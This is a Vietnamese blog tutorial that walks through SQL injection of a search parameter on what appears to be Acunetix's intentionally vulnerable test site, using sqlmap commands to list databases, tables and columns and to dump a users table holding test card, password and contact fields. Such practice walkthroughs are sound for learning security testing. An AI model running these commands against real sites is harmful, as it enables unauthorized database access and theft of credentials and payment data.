Basic SQL Injection With Sqlmap - Sang Bui

Trang chủ » Cách Sử Dụng Sqlmap » Basic SQL Injection With Sqlmap - Sang Bui

Có thể bạn quan tâm

SQL Injection with sqlmap Site: http://testphp.acunetix.com/

======================= 1. Check the URL.

Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs => Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

[INFO] fetching database names available databases [2]: [*] acuart [*] information_schema
1234 [INFO]fetching database namesavailable databases[2]:[*]acuart[*]information_schema

Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó. Cái “acuart” là tên của DB trang web, cái chúng ta cần.

2. Sau khi có tên DB, chúng ta sẽ get Table.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+
123456789101112 Database:acuart[8tables]+-----------+|artists||carts||categ||featured||guestbook||pictures||products||users|+-----------+

sqlmap lấy thông tin khá nhanh.

3. Get Columns.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

Table: categ [3 columns] +--------+-------------+ | Column | Type | +--------+-------------+ | cat_id | int(5) | | cdesc | tinytext | | cname | varchar(50) | +--------+-------------+ Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ Database: acuart Table: carts [3 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | cart_id | varchar(100) | | item | int(11) | | price | int(11) | +---------+--------------+ Database: acuart Table: pictures [8 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | a_id | int(11) | | cat_id | int(11) | | img | varchar(50) | | pic_id | int(5) | | plong | text | | price | int(11) | | pshort | mediumtext | | title | varchar(100) | +--------+--------------+ Database: acuart Table: featured [2 columns] +--------------+---------+ | Column | Type | +--------------+---------+ | feature_text | text | | pic_id | int(11) | +--------------+---------+ Database: acuart Table: products [5 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | description | text | | id | int(10) unsigned | | name | text | | price | int(10) unsigned | | rewritename | text | +-------------+------------------+ Database: acuart Table: artists [3 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | adesc | text | | aname | varchar(50) | | artist_id | int(5) | +-----------+-------------+ Database: acuart Table: guestbook [3 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | mesaj | text | | sender | varchar(150) | | senttime | int(32) | +----------+--------------+
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697 Table:categ[3columns]+--------+-------------+|Column|Type|+--------+-------------+|cat_id|int(5)||cdesc|tinytext||cname|varchar(50)|+--------+-------------+ Database:acuartTable:users[8columns]+---------+--------------+|Column|Type|+---------+--------------+|address|mediumtext||cart|varchar(100)||cc|varchar(100)||email|varchar(100)||name|varchar(100)||pass|varchar(100)||phone|varchar(100)||uname|varchar(100)|+---------+--------------+ Database:acuartTable:carts[3columns]+---------+--------------+|Column|Type|+---------+--------------+|cart_id|varchar(100)||item|int(11)||price|int(11)|+---------+--------------+ Database:acuartTable:pictures[8columns]+--------+--------------+|Column|Type|+--------+--------------+|a_id|int(11)||cat_id|int(11)||img|varchar(50)||pic_id|int(5)||plong|text||price|int(11)||pshort|mediumtext||title|varchar(100)|+--------+--------------+ Database:acuartTable:featured[2columns]+--------------+---------+|Column|Type|+--------------+---------+|feature_text|text||pic_id|int(11)|+--------------+---------+ Database:acuartTable:products[5columns]+-------------+------------------+|Column|Type|+-------------+------------------+|description|text||id|int(10)unsigned||name|text||price|int(10)unsigned||rewritename|text|+-------------+------------------+ Database:acuartTable:artists[3columns]+-----------+-------------+|Column|Type|+-----------+-------------+|adesc|text||aname|varchar(50)||artist_id|int(5)|+-----------+-------------+ Database:acuartTable:guestbook[3columns]+----------+--------------+|Column|Type|+----------+--------------+|mesaj|text||sender|varchar(150)||senttime|int(32)|+----------+--------------+

4. Dump Data.

Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

Database: acuart Table: users [1 entry] +---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+ | cc | name | cart | pass | uname | phone | email | address | +---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+ | 1234-5678-2300-9000 | John Smith | 2151a037665545e3772e324cce1add90 | test | test | 2323345 | email@email.com | 21 street | +---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+ [15:32:57] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.acunetix.com/dump/acuart/users.csv' [15:32:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.acunetix.com'
1234567891011 Database:acuartTable:users[1entry]+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+|cc|name|cart|pass|uname|phone|email|address|+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+|1234-5678-2300-9000|John Smith|2151a037665545e3772e324cce1add90|test|test|2323345|email@email.com|21street|+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+ [15:32:57][INFO]table'acuart.users'dumped toCSV file'/root/.sqlmap/output/testphp.acunetix.com/dump/acuart/users.csv'[15:32:57][INFO]fetched data logged totext files under'/root/.sqlmap/output/testphp.acunetix.com'

Đến đây chúng ta đã có được thông tin cần thiết.

Từ khóa » Cách Sử Dụng Sqlmap